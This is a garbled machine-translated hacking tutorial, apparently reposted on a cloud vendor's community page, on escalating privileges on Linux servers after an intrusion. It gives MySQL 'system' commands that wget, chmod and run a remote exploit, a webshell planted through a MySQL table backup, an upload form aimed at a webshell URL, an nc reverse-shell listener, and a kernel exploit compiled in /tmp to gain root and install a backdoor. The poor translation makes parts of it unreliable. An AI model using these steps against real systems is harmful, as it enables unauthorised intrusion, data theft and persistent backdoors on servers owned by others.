The method of Linux intrusion right (server claim)

Source: Internet
Author: User
Tags chmod configuration settings php file readable ssh

The method of using MySQL root to extract power

The MySQL 5.x introduces a system function that executes commands that can be executed by using this function when MySQL is logged in as root, which is, of course, within the purview of the permission.

Generally we follow the usual idea, get to MySQL root password, we will connect up, create a table, and then outfile, get a Webshell, and then mention the right so. Today we'll put it another way.

According to the above method, we need to know the absolute path of the web, of course, this is not easy to find, some have sqlinjection, may be the error will be displayed, and some not necessarily. But according to my method, there is no need to go to the Web path, directly execute

Mysql>system vi/etc/httpd/conf/httpd.conf;

Just so you can find the path to the Web, of course, our goal is not to find a Web path, put Webshell in. We're going to do other things like, download exp execution, get root permission, and then install the back door

Mysql>system wget http://www.xxx.com/xxxx;

Mysql>system chmod +x xxxx; Mysql>system./xxxx;

This is the root of the MySQL system root at this time, the rest of the matter, if opened SSH, on SSH connection, enter the user password MySQL, OK, fix.

Linux Low privilege claim

Rebound try TMP to create a good file, Shell directory horse, execute, local NC monitor online, WhoAmI, is wwwroot permissions

View version

Can CD to the root directory superior (/var/www/virtual/), and then LS, the overall site is out, the target station did not blind the folder name, but no permission to jump in

Try tar packing, no permissions, try to pack the target station directory files separately, but the root directory conn.config is limited to the current target station readable permissions.

Try the CP target station include directory, unexpectedly can copy over, but cannot write copy not past, found the database configuration information, and then another server.

The database is backed up with a Phpspyshell first:

Check to see some configuration information and account number, but no background path and other sensitive information

The scan tool does not sweep the destination Web folder, and is estimated to have been modified

Try to mention the right Cmdshell as user or root, not directly to see Apache configuration settings, try to wget a few exp, but useless, estimated to have been patched

CP May, but does not know the specific information

Since the web does not have permissions, try MySQL to see if there is a privilege bar

Direct

CREATE TABLE Hackdn (spider BLOB); Creating table Hackdn

Insert a Word

Save

Then back up to the target path 1.php file. Found not connected.

CP came to see, was separated by the translation character,

If you do not add ', insert

After backing up to PHP, save the following code locally as

The code is as follows Copy Code
1.HTML <form enctype= "Multipart/form-data" action= "http://www.webshell.cc/mysql_bak/1.php" method= "POST" >
<input name= "MyFile" type= "File" >
<input value= "submitted" type= "Submit" >
</form>

Simple Linux power of reference

Get the shell and get ready to claim it. First look at the Linux kernel

Uname-a

2.6.18-194.11.3.el5 Kernel 2010, this good CentOS release 5.5 good to mention

Then Baidu or other path to find exp,2.6.18-194 This kernel I have already collected. Upload/tmp, why upload to this directory?

Because the TMP directory can be written executable general, continue ing.

To find an extranet IP listening 12666, of course, 12666 can also be changed. I'm here to use NC monitor nc-l-n-v-P 12666

And then point your shell

The following is what happens when the connection succeeds

Then we go into the/tmp directory

Cd/tmp into the TMP directory, look at the 2.6.18-194 we uploaded earlier.

I have permission rwx, readable writable executable. If you do not have permission chmod-r 777 file name

My exp Here has been compiled, the direct execution overflow is OK./2.6.18-194 If your exp does not compile gcc-o/tmp/filename/tmp/filename. C, you can compile it yourself.

It worked.. In fact, Linux right is still very simple, the key to see there is no exp ... It's OVER!!!!!

Related Article

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.